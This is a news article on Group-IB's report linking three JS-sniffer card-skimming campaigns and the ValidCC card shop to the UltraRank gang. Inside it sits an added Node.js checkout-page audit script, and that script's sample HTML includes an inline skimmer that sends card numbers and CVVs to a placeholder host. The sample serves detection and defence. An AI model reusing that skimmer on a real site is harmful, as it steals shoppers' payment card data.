New report details how previously unknown group masterminded attacks

UltraRank cybercrime gang behind payment card data thefts previously linked to Magecart

A sophisticated cybercrime group generating more than $5,000 a day through JS sniffer infections was behind a trio of campaigns previously attributed to separate Magecart groups.

This is according to threat intel outfit Group-IB, which today (August 27) released a report on the threat actors.

Dubbed ‘UltraRank’ by the cyber investigations firm, the gang has compromised 691 websites and 13 third-party suppliers in Europe, Asia, and North and Latin America since it was established five years ago.

Third-party victims have included marketing agencies, web design agencies, website developers, and browser notification services, the findings state.

Misattributed attacks

An investigation concluded that UltraRank was responsible for a trio of campaigns that were previously linked to separate Magecart groups.

Security researchers had misattributed the attacks because UltraRank has frequently changed its infrastructure and malicious code, according to Group-IB.

The campaigns, one of which is still active, also used different JS sniffer families: FakeLogistics, WebRank, and SnifLite.


However, Group-IB’s intel analysts suspected that the attacks were the handiwork of a single actor when they noticed similarities in domain registration patterns and the mechanisms used to hide the command-and-control server’s location.

The campaigns also hosted malicious code at multiple locations under different domain names, and combined complex supply chain attacks with single-target infections – as was the case in the attack against the website of Block & Company, North America’s largest manufacturer of cash handling products.

The investigation’s first breakthrough came in February, with the discovery that at least five websites built by US marketing company The Brandit Agency on the Magento ecommerce platform – including that of T-Mobile – had been infected with JS sniffers loaded from the same external website.

JS (JavaScript) sniffers are malicious scripts injected into online stores, typically on checkout pages, to steal payment card data as customers enter it.
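As an added illustration (not code from the Group-IB report or from this article), the following Node.js script audits a checkout page for the two traces a JS sniffer infection tends to leave: a script loaded from an origin the store does not expect, and inline code that reads card fields and ships them elsewhere. It also emits the Content Security Policy `script-src` directive that would have blocked the unexpected loader. The shop hostname, the allowlisted payment-provider host, the HTML and the inline skimmer-style handler are all constructed for the example; the hostnames are placeholders and have no connection to UltraRank or its victims.

```javascript
// Added example: a dependency-free checkout-page audit for Node.js.
// Not code from Group-IB or The Daily Swig; hostnames, HTML and the inline
// "skimmer" below are constructed placeholders for demonstration only.

// Field names a card-harvesting script typically reads.
const CARD_FIELD_RE = /(card\s*number|cardnumber|ccnum|cvv|cvc|expir|\bpan\b)/i;
// Ways an inline script can ship data off the page.
const EXFIL_RE = /(\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*=)/i;

// Pull every <script> tag out of raw HTML: its src (if any), whether it carries
// a Subresource Integrity hash, and its inline body (if any).
function extractScripts(html) {
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const srcRe = /(?:^|\s)src\s*=\s*["']([^"']+)["']/i;
  const integrityRe = /(?:^|\s)integrity\s*=/i;
  const scripts = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = srcRe.exec(attrs);
    scripts.push({ src: src ? src[1] : null, hasIntegrity: integrityRe.test(attrs), body });
  }
  return scripts;
}

// Audit one page. allowedHosts are third-party hosts the store knowingly loads
// scripts from (its PSP, tag manager, etc.); the page's own host is always allowed.
function auditCheckoutPage(html, pageUrl, allowedHosts) {
  const pageHost = new URL(pageUrl).hostname;
  const allowed = new Set([pageHost, ...allowedHosts]);
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      const host = new URL(s.src, pageUrl).hostname;
      if (!allowed.has(host)) {
        // The classic sniffer pattern: a loader pointing at an attacker-held domain.
        findings.push({ kind: 'unexpected-origin', host, src: s.src });
      } else if (host !== pageHost && !s.hasIntegrity) {
        // Allowed third party, but a compromised supplier could swap the file.
        findings.push({ kind: 'third-party-without-sri', host, src: s.src });
      }
    } else if (CARD_FIELD_RE.test(s.body) && EXFIL_RE.test(s.body)) {
      // Inline code that both touches card fields and beacons out.
      findings.push({ kind: 'inline-card-harvester', snippet: s.body.trim().slice(0, 80) });
    }
  }
  return findings;
}

// The matching preventive control: a CSP script-src built from the same allowlist.
function buildScriptSrcPolicy(allowedHosts) {
  return `script-src 'self' ${allowedHosts.map((h) => `https://${h}`).join(' ')};`;
}

// Constructed sample page: a first-party script, a PSP script with and without
// SRI, a loader from an unknown host, and an inline skimmer-style handler.
const SAMPLE_HTML = `
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://js.payments.example.com/v3/" integrity="sha384-CONSTRUCTED_PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://js.payments.example.com/v3/helper.js"></script>
<script src="//static-cdn.example.net/js/jquery.min.js"></script>
<script>
  document.querySelector('form#checkout').addEventListener('submit', function () {
    var cardNumber = document.querySelector('[name=cardnumber]').value;
    var cvv = document.querySelector('[name=cvv]').value;
    new Image().src = 'https://static-cdn.example.net/i.gif?d=' + btoa(cardNumber + '|' + cvv);
  });
</script>
</head><body></body></html>`;

const SAMPLE_PAGE_URL = 'https://shop.example.com/checkout';
const SAMPLE_ALLOWED_HOSTS = ['js.payments.example.com'];

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditCheckoutPage(SAMPLE_HTML, SAMPLE_PAGE_URL, SAMPLE_ALLOWED_HOSTS)) {
    console.log(JSON.stringify(f));
  }
  console.log(buildScriptSrcPolicy(SAMPLE_ALLOWED_HOSTS));
}
```

Run it with `node audit.js` against a saved copy of a checkout page. On the constructed sample it reports the PSP helper loaded without SRI, the loader from the unknown `static-cdn.example.net` host, and the inline handler. The keyword heuristics are deliberately simple and will miss obfuscated sniffers; the durable controls are the allowlist enforced as a CSP, SRI on every third-party script, and change monitoring on the served files, since campaigns like this one rotate hosting domains precisely to defeat static indicators.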

The number of JS sniffer families has more than doubled in under a year and a half, from 38 in March 2019 to 96 today, according to Group-IB research.

Lucrative business model

Eschewing the approach of other JS sniffer operators – buying and reselling luxury goods or cooperating with third-party carders – UltraRank instead sells card data through an affiliated card shop, ValidCC, that has similar infrastructure to the group.

During one week in 2019, the store generated daily revenues of $5,000-$7,000 from the sale of bank card data and paid $25,000-$30,000 to third-party suppliers of stolen payment data, according to the card shop’s own statistics.

The researchers linked the card shop to UltraRank after noticing that it appeared shortly before the first JS sniffer campaign was launched.

The researchers found comments posted on underground forums by ‘SPR’, purporting to be a representative of ValidCC, that claimed that most of the ill-gotten data was obtained through JS sniffer infections. This individual also alternated between posting messages in English and Russian.

‘Huge step forward’

UltraRank’s sophistication shows how cybercriminals have raised ‘customer’ service standards and are continually “fine-tuning and simplifying the instruments for solving specific tasks”, said Group-IB threat intelligence analyst Victor Okorokov in a press release promoting the report.

“JS sniffers represent a huge step forward in comparison to the previous generation of instruments for stealing money,” Okorokov told The Daily Swig.

“Cybercriminals used to create complex malware requiring advanced programming skills, like banking trojans, for stealing money. Apart from developing their tools, they also had to think through how to infect the targeted infrastructure, which was usually carefully protected.

“JS sniffers, de facto several lines of code, give cybercriminals access to the bank card data of thousands of users of e-commerce websites at once.

“JS sniffers are also distributed under the software-as-a-service model, granting folks with moderate or even no programming skill the ability to conduct large-scale malicious campaigns.”

This article was updated on August 27 with comments from Group-IB.
